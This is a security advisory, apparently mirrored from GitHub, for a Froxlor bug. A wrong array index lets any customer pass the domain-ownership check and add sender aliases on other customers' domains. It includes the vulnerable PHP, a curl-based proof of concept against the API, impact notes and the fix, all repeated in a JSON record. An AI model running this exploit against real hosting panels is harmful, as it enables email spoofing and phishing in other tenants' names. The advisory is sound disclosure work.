GHSA-VMJJ-QR7V-PXM6

Vulnerability from github – Published: 2026-04-16 00:47 – Updated: 2026-04-16 00:47
VLAI?
Summary
Froxlor has an Email Sender Alias Domain Ownership Bypass via Wrong Array Index Allows Cross-Customer Email Spoofing
Details

Summary

In EmailSender::add(), the domain ownership validation for full email sender aliases uses the wrong array index when splitting the email address, passing the local part instead of the domain to validateLocalDomainOwnership(). This causes the ownership check to always pass for non-existent "domains," allowing any authenticated customer to add sender aliases for email addresses on domains belonging to other customers. Postfix's sender_login_maps then authorizes the attacker to send emails as those addresses.

Details

In lib/Froxlor/Api/Commands/EmailSender.php at line 100, when a customer adds a full email address (not a @domain wildcard) as an allowed sender, the code splits on @ and takes index [0]:

// Line 96-106
if (substr($allowed_sender, 0, 1) != '@') {
    if (!Validate::validateEmail($idna_convert->encode($allowed_sender))) {
        Response::standardError('emailiswrong', $allowed_sender, true);
    }
    self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? "");  // BUG: [0] is the local part
} else {
    if (!Validate::validateDomain($idna_convert->encode(substr($allowed_sender, 1)))) {
        Response::standardError('wildcardemailiswrong', substr($allowed_sender, 1), true);
    }
    self::validateLocalDomainOwnership(substr($allowed_sender, 1));  // CORRECT: passes domain
}

For input admin@domain-b.com, explode("@", "admin@domain-b.com") returns ["admin", "domain-b.com"]. Index [0] is "admin" — the local part, not the domain.

The validateLocalDomainOwnership() function (lines 346-355) then queries panel_domains for a domain matching "admin":

private static function validateLocalDomainOwnership(string $domain): void
{
    $sel_stmt = Database::prepare("SELECT customerid FROM `" . TABLE_PANEL_DOMAINS . "` WHERE `domain` = :domain");
    $domain_result = Database::pexecute_first($sel_stmt, ['domain' => $domain]);
    if ($domain_result && $domain_result['customerid'] != CurrentUser::getField('customerid')) {
        Response::standardError('senderdomainnotowned', $domain, true);
    }
}

Since no domain named "admin" exists in panel_domains, $domain_result is false, and the function returns without error — the ownership check silently passes.

The inserted mail_sender_aliases row is then picked up by Postfix's sender_login_maps query (configured in mysql-virtual_sender_permissions.cf):

... UNION (SELECT mail_sender_aliases.email FROM mail_sender_aliases
WHERE mail_sender_aliases.allowed_sender = '%s') ...

This query maps the allowed_sender back to the mail user, authorizing them to send as that address via SMTP.

PoC

# Prerequisites: Froxlor instance with mail.enable_allow_sender enabled,
# two customers: Customer A (owns domain-a.com) and Customer B (owns domain-b.com)

# Step 1: As Customer A, add a sender alias claiming Customer B's domain
# Via API:
curl -X POST 'https://froxlor-host/api/v1/' \
  -H 'Authorization: Basic <customer-A-credentials>' \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "EmailSender.add",
    "params": {
      "emailaddr": "myaccount@domain-a.com",
      "allowed_sender": "ceo@domain-b.com"
    }
  }'

# Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B
# Actual: 200 OK — alias is created because validateLocalDomainOwnership
#         receives "ceo" (local part) instead of "domain-b.com" (domain)

# Step 2: Verify the alias was inserted
curl -X POST 'https://froxlor-host/api/v1/' \
  -H 'Authorization: Basic <customer-A-credentials>' \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "EmailSender.listing",
    "params": {"emailaddr": "myaccount@domain-a.com"}
  }'

# Step 3: Customer A can now send email as ceo@domain-b.com via SMTP
# because Postfix sender_login_maps will match the mail_sender_aliases entry
# and authorize Customer A's mail account to use that sender address.

The same attack works via the web UI by POST-ing to customer_email.php with action=add_sender and the target domain in allowed_domain.

Impact

Any authenticated customer on a multi-tenant Froxlor instance can add sender aliases for email addresses on domains belonging to other customers. This allows:

  • Cross-customer email spoofing: Send emails impersonating users on other customers' domains, bypassing Postfix's smtpd_sender_login_maps restriction that is specifically designed to prevent this.
  • Multi-tenant isolation breach: The domain ownership check (validateLocalDomainOwnership) is the only barrier preventing cross-customer sender aliasing, and it is completely ineffective for full email addresses.
  • Phishing and reputation damage: Spoofed emails originate from the legitimate mail server, passing SPF/DKIM checks for the target domain if those records point to the Froxlor server.

Note: The wildcard (@domain) code path at line 105 is not affected — it correctly passes the domain to validateLocalDomainOwnership().

Recommended Fix

Change index [0] to [1] on line 100 of lib/Froxlor/Api/Commands/EmailSender.php:

// Before (line 100):
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? "");

// After:
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[1] ?? "");

This ensures the domain part of the email address is passed to the ownership validation, matching the behavior of the wildcard path on line 105.

Severity ?
5.0 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T00:47:05Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nIn `EmailSender::add()`, the domain ownership validation for full email sender aliases uses the wrong array index when splitting the email address, passing the local part instead of the domain to `validateLocalDomainOwnership()`. This causes the ownership check to always pass for non-existent \"domains,\" allowing any authenticated customer to add sender aliases for email addresses on domains belonging to other customers. Postfix\u0027s `sender_login_maps` then authorizes the attacker to send emails as those addresses.\n\n## Details\n\nIn `lib/Froxlor/Api/Commands/EmailSender.php` at line 100, when a customer adds a full email address (not a `@domain` wildcard) as an allowed sender, the code splits on `@` and takes index `[0]`:\n\n```php\n// Line 96-106\nif (substr($allowed_sender, 0, 1) != \u0027@\u0027) {\n    if (!Validate::validateEmail($idna_convert-\u003eencode($allowed_sender))) {\n        Response::standardError(\u0027emailiswrong\u0027, $allowed_sender, true);\n    }\n    self::validateLocalDomainOwnership(explode(\"@\", $allowed_sender)[0] ?? \"\");  // BUG: [0] is the local part\n} else {\n    if (!Validate::validateDomain($idna_convert-\u003eencode(substr($allowed_sender, 1)))) {\n        Response::standardError(\u0027wildcardemailiswrong\u0027, substr($allowed_sender, 1), true);\n    }\n    self::validateLocalDomainOwnership(substr($allowed_sender, 1));  // CORRECT: passes domain\n}\n```\n\nFor input `admin@domain-b.com`, `explode(\"@\", \"admin@domain-b.com\")` returns `[\"admin\", \"domain-b.com\"]`. Index `[0]` is `\"admin\"` \u2014 the local part, not the domain.\n\nThe `validateLocalDomainOwnership()` function (lines 346-355) then queries `panel_domains` for a domain matching `\"admin\"`:\n\n```php\nprivate static function validateLocalDomainOwnership(string $domain): void\n{\n    $sel_stmt = Database::prepare(\"SELECT customerid FROM `\" . TABLE_PANEL_DOMAINS . \"` WHERE `domain` = :domain\");\n    $domain_result = Database::pexecute_first($sel_stmt, [\u0027domain\u0027 =\u003e $domain]);\n    if ($domain_result \u0026\u0026 $domain_result[\u0027customerid\u0027] != CurrentUser::getField(\u0027customerid\u0027)) {\n        Response::standardError(\u0027senderdomainnotowned\u0027, $domain, true);\n    }\n}\n```\n\nSince no domain named `\"admin\"` exists in `panel_domains`, `$domain_result` is false, and the function returns without error \u2014 the ownership check silently passes.\n\nThe inserted `mail_sender_aliases` row is then picked up by Postfix\u0027s `sender_login_maps` query (configured in `mysql-virtual_sender_permissions.cf`):\n\n```sql\n... UNION (SELECT mail_sender_aliases.email FROM mail_sender_aliases\nWHERE mail_sender_aliases.allowed_sender = \u0027%s\u0027) ...\n```\n\nThis query maps the `allowed_sender` back to the mail user, authorizing them to send as that address via SMTP.\n\n## PoC\n\n```bash\n# Prerequisites: Froxlor instance with mail.enable_allow_sender enabled,\n# two customers: Customer A (owns domain-a.com) and Customer B (owns domain-b.com)\n\n# Step 1: As Customer A, add a sender alias claiming Customer B\u0027s domain\n# Via API:\ncurl -X POST \u0027https://froxlor-host/api/v1/\u0027 \\\n  -H \u0027Authorization: Basic \u003ccustomer-A-credentials\u003e\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"command\": \"EmailSender.add\",\n    \"params\": {\n      \"emailaddr\": \"myaccount@domain-a.com\",\n      \"allowed_sender\": \"ceo@domain-b.com\"\n    }\n  }\u0027\n\n# Expected: Error \"senderdomainnotowned\" because domain-b.com belongs to Customer B\n# Actual: 200 OK \u2014 alias is created because validateLocalDomainOwnership\n#         receives \"ceo\" (local part) instead of \"domain-b.com\" (domain)\n\n# Step 2: Verify the alias was inserted\ncurl -X POST \u0027https://froxlor-host/api/v1/\u0027 \\\n  -H \u0027Authorization: Basic \u003ccustomer-A-credentials\u003e\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"command\": \"EmailSender.listing\",\n    \"params\": {\"emailaddr\": \"myaccount@domain-a.com\"}\n  }\u0027\n\n# Step 3: Customer A can now send email as ceo@domain-b.com via SMTP\n# because Postfix sender_login_maps will match the mail_sender_aliases entry\n# and authorize Customer A\u0027s mail account to use that sender address.\n```\n\nThe same attack works via the web UI by POST-ing to `customer_email.php` with `action=add_sender` and the target domain in `allowed_domain`.\n\n## Impact\n\nAny authenticated customer on a multi-tenant Froxlor instance can add sender aliases for email addresses on domains belonging to other customers. This allows:\n\n- **Cross-customer email spoofing**: Send emails impersonating users on other customers\u0027 domains, bypassing Postfix\u0027s `smtpd_sender_login_maps` restriction that is specifically designed to prevent this.\n- **Multi-tenant isolation breach**: The domain ownership check (`validateLocalDomainOwnership`) is the only barrier preventing cross-customer sender aliasing, and it is completely ineffective for full email addresses.\n- **Phishing and reputation damage**: Spoofed emails originate from the legitimate mail server, passing SPF/DKIM checks for the target domain if those records point to the Froxlor server.\n\nNote: The wildcard (`@domain`) code path at line 105 is **not** affected \u2014 it correctly passes the domain to `validateLocalDomainOwnership()`.\n\n## Recommended Fix\n\nChange index `[0]` to `[1]` on line 100 of `lib/Froxlor/Api/Commands/EmailSender.php`:\n\n```php\n// Before (line 100):\nself::validateLocalDomainOwnership(explode(\"@\", $allowed_sender)[0] ?? \"\");\n\n// After:\nself::validateLocalDomainOwnership(explode(\"@\", $allowed_sender)[1] ?? \"\");\n```\n\nThis ensures the domain part of the email address is passed to the ownership validation, matching the behavior of the wildcard path on line 105.",
  "id": "GHSA-vmjj-qr7v-pxm6",
  "modified": "2026-04-16T00:47:05Z",
  "published": "2026-04-16T00:47:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-vmjj-qr7v-pxm6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/froxlor/froxlor"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Froxlor has an Email Sender Alias Domain Ownership Bypass via Wrong Array Index Allows Cross-Customer Email Spoofing"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.